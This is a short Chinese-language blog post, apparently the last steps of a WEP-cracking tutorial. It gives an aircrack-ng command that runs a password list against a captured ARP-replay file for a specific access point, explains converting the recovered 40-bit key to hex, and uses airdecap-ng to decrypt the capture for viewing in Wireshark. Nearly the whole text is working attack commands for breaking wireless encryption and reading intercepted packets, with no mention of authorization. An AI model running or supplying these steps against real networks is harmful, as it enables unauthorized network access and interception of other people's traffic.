1/破解
sudo aircrack-ng -w passwd.lst -b 00:13:10:30:9C arpreplay-01.cap -n 64(每次攻击都会在档名后面加后缀01,02,03...)
这次破解,发现这个WEP是40bit,以5个16进位表示,也就是5个ASCII或HEX,可以查ASCII编码,表,如果密码的是控制码,WEP的密码就是HEX,把冒号去掉,直接用hex就可以,如00:13:77:10:32 --> 0013771032
2/解码
sudo airdecap-ng -w 0013771032 arpreplay-01.cap
0013771032 就是WEP的密码。得出的arpreplay-01-dec.cap用wireshark打开,就看到封包内容了。
阅读(2702) | 评论(0) | 转发(1) |